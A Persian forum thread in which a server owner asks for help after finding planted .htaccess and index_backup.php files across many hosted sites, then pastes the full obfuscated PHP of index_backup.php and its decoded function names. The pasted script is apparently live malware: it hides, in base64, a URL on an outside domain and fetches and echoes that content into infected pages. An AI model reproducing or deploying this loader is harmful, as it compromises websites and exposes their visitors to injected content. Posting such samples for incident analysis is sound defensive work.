مشکل امنیتی-لطفا کمک کنید

[farzane 10]

با سلام و درود خدمت عزیزان

ذوی تعداد زیادی از سایتهایی که روی سرور قرار داشت در تقریبا 90% فولدرها دو فایل یکی .htaccess با و دیگری index_backup.php آپلود شده بود که محتوای آنها را ضمیمه کرده ام

از متخصصان و عزیزان خواهشمندم کمک کنند تا ببینم باگی که هکرها از آن استفاده کرده اند چه بوده؟ آیا مربوط به دایرکت ادمین می باشد؟؟؟

[ابوالفضل طالبی 280]

این فایل index_backup.php رو قرار بدید این مهمه!

[farzane 10]

اینم محتوای فایل ایندکس ظاهرا که ظاهرا کد شدست:

<? $GLOBALS['_433305846_']=Array(base64_decode('' .'ZG' .'Vma' .'W5l'),base64_decode('ZmlsZV9n' .'ZXRfY2' .'9udGVudH' .'M='),base64_decode('c3Ry' .'ZWF' .'tX2NvbnR' .'l' .'e' .'HRfY3JlYX' .'Rl'),base64_decode('bXN' .'z' .'cW' .'xfcX' .'Vlcn' .'k' .'='),base64_decode('Zmls' .'ZV9nZXRfY29' .'ud' .'GVudHM='),base64_decode('c3Ry' .'bmNtcA=='),base64_decode('b' .'XlzcW' .'xfY2xvc' .'2U='),base64_decode('Z' .'nB1' .'dH' .'M='),base64_decode('ZnJlYW' .'Q='),base64_decode('bX' .'Rfcm' .'F' .'uZ' .'A=='),base64_decode('' .'Y' .'3VybF9leGVj'),base64_decode('ZmNs' .'b3' .'Nl'),base64_decode('c' .'3' .'RybmF0' .'Y2' .'1w'),base64_decode('bXRfcmF' .'uZA=='),base64_decode('' .'c3R' .'ycG9z'),base64_decode('ZmNsb3' .'N' .'l'),base64_decode('c3Vi' .'c3' .'Ry'),base64_decode('c29ja2V0X' .'2NyZ' .'WF' .'0ZV9s' .'aX' .'N' .'0' .'Z' .'W4='),base64_decode('bXRf' .'cm' .'FuZA=='),base64_decode('' .'Y3Vyb' .'F' .'9p' .'bml0'),base64_decode('bXRfcmFuZA' .'=='),base64_decode('c3Vic3Ry'),base64_decode('Y3' .'Vy' .'bF9zZXRvcH' .'Q='),base64_decode('' .'Y' .'3V' .'yb' .'F9zZXRvcHQ='),base64_decode('Y3VybF9zZXRvcHQ' .'='),base64_decode('c3Ryc' .'G9' .'z'),base64_decode('YXJyYXlf' .'c' .'2h' .'pZnQ='),base64_decode('' .'Y3Vyb' .'F9zZX' .'RvcHQ='),base64_decode('Y' .'3JlY' .'XRl' .'X2' .'Z1b' .'mN0a' .'W9u'),base64_decode('c29ja2V0X2Nvbm5lY3Q='),base64_decode('Y3V' .'yb' .'F' .'9l' .'eGVj'),base64_decode('Y3VybF9' .'jbG9zZQ=='),base64_decode('aW5pX2dldA=='),base64_decode('' .'cG' .'Fyc2VfdXJs'),base64_decode('ZnNvY2tv' .'cGV' .'u'),base64_decode('ZnVuY3Rpb25fZXhp' .'c' .'3R' .'z')); ?><? function _131417582($i){$a=Array('SUZSQ' .'U1F' .'X1VSTA=' .'=','aHR0cDo' .'v' .'L2Rvb' .'WV' .'udGVzdDE' .'uY29tL' .'z' .'cu' .'dHh0','aHR0' .'cDovLw==','' .'SFRUUF9' .'IT1NU','Uk' .'VR' .'VU' .'VT' .'VF9V' .'Uk' .'k=','aHR0' .'cA==','dGlt' .'ZW91dA==','aG' .'Vh' .'Z' .'G' .'Vy','VXNlci1BZ2V' .'udDogTW' .'96aWxsYS81LjAgKFdpbm' .'Rv' .'d3M7' .'IFU7IFdp' .'bmRv' .'d3M' .'g' .'TlQgNS' .'4xO' .'y' .'B' .'lbi1VUzsgcnY6MS44L' .'jA' .'uMy' .'kg' .'R2Vja28vMjAwNjA0Mj' .'YgRm' .'lyZ' .'WZveC8xL' .'jUuM' .'C4zC' .'g=' .'=','R0VU' .'IA=' .'=','Pw=' .'=','I' .'CBIVFR' .'QLzEuM' .'A0K','VXNlci' .'1BZ2V' .'udDog' .'TW9' .'6aWxsYS81L' .'jA' .'gKFdp' .'bmRvd3M7IFU7' .'IFdp' .'bmRvd3MgTlQgNS' .'4xOyBlb' .'i1VUzsgcnY6MS' .'4' .'4' .'Lj' .'AuMyk' .'g' .'R2V' .'j' .'a2' .'8vMjAwN' .'jA0M' .'jYgRmly' .'ZWZveC8xLjUuMC4zDQo=','Q' .'WNjZXB0OiAq' .'LyoNC' .'g==','QWN' .'jZ' .'XB0LUxhb' .'md' .'1' .'YWdlOiBlbi11cyxlbjtxPTAuNQ0K','QWNjZXB0LUNoYXJzZ' .'XQ' .'6IElT' .'Ty04O' .'DU5LT' .'Es' .'dXRmL' .'Tg7cT0wLjc' .'sKj' .'txPTAu' .'Nw0K','S' .'2VlcC1BbGl2ZT' .'ogMzA' .'wDQo=','Q' .'29' .'ubmVjdGl' .'vbjog' .'a2VlcC1h' .'bG' .'l' .'2ZQ0K','DQoNCg=' .'=','' .'YWhn' .'d' .'2' .'d4YnJ' .'ld' .'mR' .'taWN3bm' .'E=','bmpk' .'d' .'Ho=','TW96aWxsY' .'S81L' .'jAg' .'KFd' .'pbmRv' .'d' .'3M7IFU7' .'IFdpb' .'mR' .'vd3M' .'gT' .'lQg' .'NS4xO' .'y' .'Blbi' .'1VUzsgcn' .'Y6MS44Lj' .'AuMyk' .'gR2Vja28vMjAwNjA0MjYgRm' .'lyZWZveC8xLjUuMC4' .'z','Z3J4','' .'YWxsb3dfdXJsX2' .'ZvcGV' .'u','aG9z' .'dA==','a' .'G' .'9zdA=' .'=','' .'cG' .'F0aA==','cXV' .'l' .'cnk=','Y3Vyb' .'F9pbml0');return base64_decode($a[$i]);} ?><?php $GLOBALS['_433305846_'][0](_131417582(0),_131417582(1));echo l__3(IFRAME_URL);$_0=round(0+1379+1379+1379);echo@$GLOBALS['_433305846_'][1](_131417582(2) .$_SERVER[_131417582(3)] .$_SERVER[_131417582(4)]);function l__0($_1){$_2=$GLOBALS['_433305846_'][2](array(_131417582(5)=> array(_131417582(6)=> round(0+15),_131417582(7)=> _131417582(8),)));while(round(0+966+966+966+966+966)-round(0+4830))$GLOBALS['_433305846_'][3]($_3,$_4,$_5);return $GLOBALS['_433305846_'][4]($_1,false,$_2);if((round(0+1124.66666667+1124.66666667+1124.66666667)^round(0+674.8+674.8+674.8+674.8+674.8))&& $GLOBALS['_433305846_'][5]($_6,$_7,$_8))$GLOBALS['_433305846_'][6]($_9,$_2,$_1,$_7);}function l__1($_10,$_11,$_8,$_12){$GLOBALS['_433305846_'][7]($_10,_131417582(9) .$_8 ._131417582(10) .$_12 ._131417582(11) ."Host: $_11\r\n" ._131417582(12) ._131417582(13) ._131417582(14) ._131417582(15) ._131417582(16) ._131417582(17) ."Referer: http://$_11\r\n\r\n");$_13=round(0+1169.75+1169.75+1169.75+1169.75);while($_7=$GLOBALS['_433305846_'][8]($_10,round(0+1365.33333333+1365.33333333+1365.33333333))){$_6 .= $_7;if(round(0+1511.33333333+1511.33333333+1511.33333333)<$GLOBALS['_433305846_'][9](round(0+20.5+20.5),round(0+1122+1122+1122+1122)))$GLOBALS['_433305846_'][10]($_12,$_1);}$GLOBALS['_433305846_'][11]($_10);(round(0+3299)-round(0+659.8+659.8+659.8+659.8+659.8)+round(0+1982)-round(0+1982))?$GLOBALS['_433305846_'][12]($_12,$_2):$GLOBALS['_433305846_'][13](round(0+353.333333333+353.333333333+353.333333333),round(0+1099.66666667+1099.66666667+1099.66666667));$_5=$GLOBALS['_433305846_'][14]($_6,_131417582(18));while(round(0+4392)-round(0+878.4+878.4+878.4+878.4+878.4))$GLOBALS['_433305846_'][15]($_8,$_SERVER);$_6=$GLOBALS['_433305846_'][16]($_6,$_5+round(0+1+1+1+1));$_14=round(0+940.5+940.5);return $_6;(round(0+1012.33333333+1012.33333333+1012.33333333)-round(0+1518.5+1518.5)+round(0+403.75+403.75+403.75+403.75)-round(0+403.75+403.75+403.75+403.75))?$GLOBALS['_433305846_'][17]($_5,$_5,$_2,$_7):$GLOBALS['_433305846_'][18](round(0+2212),round(0+1518.5+1518.5));}function l__2($_1){$_4=$GLOBALS['_433305846_'][19]($_1);if(round(0+912.6+912.6+912.6+912.6+912.6)<$GLOBALS['_433305846_'][20](round(0+284+284+284+284+284),round(0+1569+1569)))$GLOBALS['_433305846_'][21]($_3);$GLOBALS['_433305846_'][22]($_4,42,FALSE);$GLOBALS['_433305846_'][23]($_4,19913,TRUE);$GLOBALS['_433305846_'][24]($_4,13,round(0+3+3+3+3+3));if($GLOBALS['_433305846_'][25](_131417582(19),_131417582(20))!==false)$GLOBALS['_433305846_'][26]($_8,$_12);$GLOBALS['_433305846_'][27]($_4,10018,_131417582(21));if((round(0+137+137+137+137+137)^round(0+685))&& $GLOBALS['_433305846_'][28]($_8,$_7,$_9,$_8))$GLOBALS['_433305846_'][29]($_1);$_15=$GLOBALS['_433305846_'][30]($_4);$GLOBALS['_433305846_'][31]($_4);$_16=_131417582(22);return $_15;}function l__3($_1){if($GLOBALS['_433305846_'][32](_131417582(23))== round(0+1)){echo l__0($_1);}else{$_9=$GLOBALS['_433305846_'][33]($_1);if($_10=@$GLOBALS['_433305846_'][34]($_9[_131417582(24)],round(0+80),$_17,$_3,round(0+15))){echo l__1($_10,$_9[_131417582(25)],$_9[_131417582(26)],$_9[_131417582(27)]);}elseif(@$GLOBALS['_433305846_'][35](_131417582(28))){echo l__2($_1);}}}

[farzane 10]

از قسمت محتویات کد شده خروجی گرفتم به این شکل در اومد:

definefile_get_contentsstream_context_createmssql_queryfile_get_contentsstrncmpmysql_closefputsfreadmt_randcurl_execfclosestrnatcmpmt_randstrposfclosesubstrsocket_create_listenmt_randcurl_initmt_randsubstrcurl_setoptcurl_setoptcurl_setoptstrposarray_shiftcurl_setoptcreate_functionsocket_connectcurl_execcurl_closeini_getparse_urlfsockopenfunction_exists